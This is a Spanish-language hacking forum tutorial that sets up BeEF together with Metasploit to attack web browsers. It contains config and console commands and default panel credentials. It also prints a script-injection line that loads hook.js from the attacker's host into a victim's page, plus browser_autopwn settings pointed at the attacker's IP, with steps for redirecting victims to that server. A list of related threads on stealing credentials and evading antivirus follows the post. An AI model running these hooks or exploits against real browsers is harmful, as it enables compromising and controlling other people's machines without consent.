comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Instalando Beef + Metasploit

  • 0 Respuestas
  • 3721 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    1.67%
  • Reputación 15
    • Ver Perfil
« en: Julio 30, 2013, 12:56:01 pm »
Bueno, hoy os traigo un tutorial, es bastante básico pero lo busqué para ver si estaba y no lo encontré asique os lo hago para vosotros ;D

Vamos a empezar por descargar el beef --> No tienes permisos para ver links. Registrate o Entra con tu cuenta o No tienes permisos para ver links. Registrate o Entra con tu cuenta

Para que funcione, necesitamos tener instalado las siguientes depencias: No tienes permisos para ver links. Registrate o Entra con tu cuenta (os lo detallaría más, pero no se que s.o usáis cada uno xD)


Una vez todo instalado, vamos a integrarlo con metasploit, para ello vamos al directorio donde tenemos los archivos del beef.



Localizamos el fichero config.yaml y lo abrimos, vamos a la línea 113 o bien buscamos la palabra "metasploit"

Y lo activamos de esta manera:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
metasploit:
enable: true

Grabamos el archivo y nos dirigimos de nuevo al directorio del beef después a extensions/metasploit y buscamos un fichero que se llama config.yaml

Modificamos las líneas introduciendo la IP de nuestro ordenador. Para evitar conflictos por si nuestra IP cambia, pondremos 127.0.0.1

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
host: "127.0.0.1"

Una vez configurados los dos archivos, ejecutamos metasploit:



Una vez se haya cargando, introducimos lo siguiente: (Teneis que ponerlo respecto a como tengais el config.yaml de /extensions/metasploit)

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
load msgrpc SeverHost=127.0.0.1 Pass=abc123



Una vez hayamos hecho esto, vamos a ejecutar beef, para ello accedemos al directorio y lo ejecutamos de esta manera.

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
./beef -x -v


Esperamos a que cargue, una vez finalizado, podemos ver la dirección de nuestro panel:



Accedemos a esa dirección y nos logueamos:

Usuario: beef
Contraseña: beef



Ahora vamos a infectar a una máquina, en mi caso seré yo mismo xD

Para infectar a una máquina hay que conseguir que cargue el fichero hook.js, para ello en una página web habría que introducir lo siguiente:

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
<script src="http://192.168.1.34:3000/hook.js"></script>
Una vez tengamos a la máquina en el panel podemos iniciar el ataque.




Como vemos, en el apartado de metasploit nos salen los exploits, ya que lo hemos implementado anteriormente.


Otro método de ataque es cargar el autopwn de metasploit y luego redirigir a la víctima a la dirección del autopwn:

Para cargarlo, vamos a la consola de metasploit e introducimos estos parámetros:

use auxiliary/server/browser_autopwn (Usar el modulo browser_autopwn)
set lhost 192.168.1.34 (IP del Atacante)
set srvhost 192.168.1.34 (IP del Atacante)
set uripath / (Path del link a enviar)
set srvport 8080 (Puerto)
exploit



Y esperamos a que termine de cargar... (en un ataque se recomienda tener ya el autopwn cargado ya que tarda).



Una vez cargando, vamos a redirigir a la víctima a la página que nos genera el autopwn:






Posibles errores al ejecutar beef.



Solución:

-Actualizar Ruby o bien:





Visitar: No tienes permisos para ver links. Registrate o Entra con tu cuenta si teneis ese error, para instalar rvm


Y eso es todo, ya tendríamos el beef integrado con metasploit y perfectamente funcionando ;D

Un saludo.



« Última modificación: Noviembre 17, 2014, 08:13:41 am por blackdrake »



 

¿Te gustó el post? COMPARTILO!



"Escaneo Invisible" con NMAP y Metasploit

Iniciado por Stiuvert

Respuestas: 3
Vistas: 6833
Último mensaje Junio 21, 2013, 09:33:46 pm
por GhostFire
Obtener contraseña (admin) de windows con metasploit usando el módulo phish_windows_credentials

Iniciado por LionSec

Respuestas: 8
Vistas: 3160
Último mensaje Mayo 25, 2015, 02:49:25 pm
por MagoAstral
Metasploit + Metasm (Ghost Writing ASM) para crear un backdoor indetectable

Iniciado por Aryenal.Bt

Respuestas: 11
Vistas: 5664
Último mensaje Noviembre 20, 2012, 12:25:34 am
por BCKTR1X
Metasploit + Hyperion (PE Crypter) para la indetección de ejecutables maliciosos

Iniciado por Aryenal.Bt

Respuestas: 12
Vistas: 5326
Último mensaje Octubre 18, 2014, 10:17:55 am
por Snifer
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 2227
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda